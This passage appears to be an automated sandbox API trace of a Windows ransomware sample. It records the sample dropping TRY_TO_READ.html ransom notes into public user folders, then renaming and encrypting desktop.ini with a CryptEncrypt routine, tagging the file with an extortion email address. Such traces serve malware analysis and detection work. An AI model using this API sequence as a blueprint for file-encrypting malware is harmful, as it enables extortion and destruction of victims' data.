lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.490] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.490] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.490] CloseHandle (hObject=0x46c) returned 1 [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3843b0 | out: hHeap=0x2e0000) returned 1 [0117.491] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.491] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.491] GetLastError () returned 0x0 [0117.491] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.491] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360c88 | out: hHeap=0x2e0000) returned 1 [0117.491] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.492] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.492] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.492] CloseHandle (hObject=0x46c) returned 1 [0117.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344570 | out: hHeap=0x2e0000) returned 1 [0117.492] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0117.492] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.493] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.493] GetLastError () returned 0x0 [0117.493] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.493] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.493] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.494] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.494] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.495] CloseHandle (hObject=0x46c) returned 1 [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3843f8 | out: hHeap=0x2e0000) returned 1 [0117.495] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.495] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.495] GetLastError () returned 0x0 [0117.495] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.495] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.495] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.496] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.496] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.497] CloseHandle (hObject=0x46c) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0117.497] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970c6210, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.497] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.497] GetLastError () returned 0x0 [0117.497] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.497] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.497] GetLastError () returned 0x0 [0117.497] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.497] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.497] WriteFile (in: hFile=0x46c, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.498] WriteFile (in: hFile=0x46c, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.498] WriteFile (in: hFile=0x46c, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.498] CloseHandle (hObject=0x46c) returned 1 [0117.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.499] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0117.499] FindNextFileW (in: hFindFile=0x35ddd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0117.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384440 [0117.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0117.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0117.499] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0117.499] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0117.499] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\desktop.ini", dwFileAttributes=0x80) returned 1 [0117.499] lstrlenW (lpString="C:\\\\Users\\Public\\desktop.ini") returned 28 [0117.499] GetProcessHeap () returned 0x2e0000 [0117.499] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x9e) returned 0x30e4b0 [0117.499] lstrcpyW (in: lpString1=0x30e4b0, lpString2="C:\\\\Users\\Public\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\desktop.ini") returned="C:\\\\Users\\Public\\desktop.ini" [0117.499] lstrcatW (in: lpString1="C:\\\\Users\\Public\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0117.499] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0117.503] CreateFileW (lpFileName="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0117.503] GetProcessHeap () returned 0x2e0000 [0117.503] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e4b0 | out: hHeap=0x2e0000) returned 1 [0117.503] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174) returned 1 [0117.503] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xae [0117.503] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0117.503] GetProcessHeap () returned 0x2e0000 [0117.503] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0117.503] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0117.504] WriteFile (in: hFile=0x46c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0117.504] WriteFile (in: hFile=0x46c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0117.504] WriteFile (in: hFile=0x46c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0117.505] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xae) returned 0x33ac00 [0117.505] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xae) returned 0x33ab48 [0117.505] SetFilePointer (in: hFile=0x46c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.505] ReadFile (in: hFile=0x46c, lpBuffer=0x33ac00, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33ac00*, lpNumberOfBytesRead=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0117.505] SetFilePointer (in: hFile=0x46c, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.505] WriteFile (in: hFile=0x46c, lpBuffer=0x33ab48*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33ab48*, lpNumberOfBytesWritten=0x2acf9c8*=0xae, lpOverlapped=0x0) returned 1 [0117.505] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0117.505] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ab48 | out: hHeap=0x2e0000) returned 1 [0117.505] CloseHandle (hObject=0x46c) returned 1 [0117.506] GetProcessHeap () returned 0x2e0000 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384440 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0117.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x30e4b0 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328a40 | out: hHeap=0x2e0000) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e648 | out: hHeap=0x2e0000) returned 1 [0117.506] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35de18 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.506] GetLastError () returned 0x0 [0117.506] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.506] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.506] GetLastError () returned 0x0 [0117.506] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0117.506] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.507] GetLastError () returned 0x0 [0117.507] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xece1ee80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.msi", cAlternateFileName="")) returned 1 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.507] GetLastError () returned 0x0 [0117.507] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExcelMUI.xml", cAlternateFileName="")) returned 1 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.507] GetLastError () returned 0x0 [0117.507] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.507] GetLastError () returned 0x0 [0117.507] FindNextFileW (in: hFindFile=0x35de18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.507] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328a40 [0117.507] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 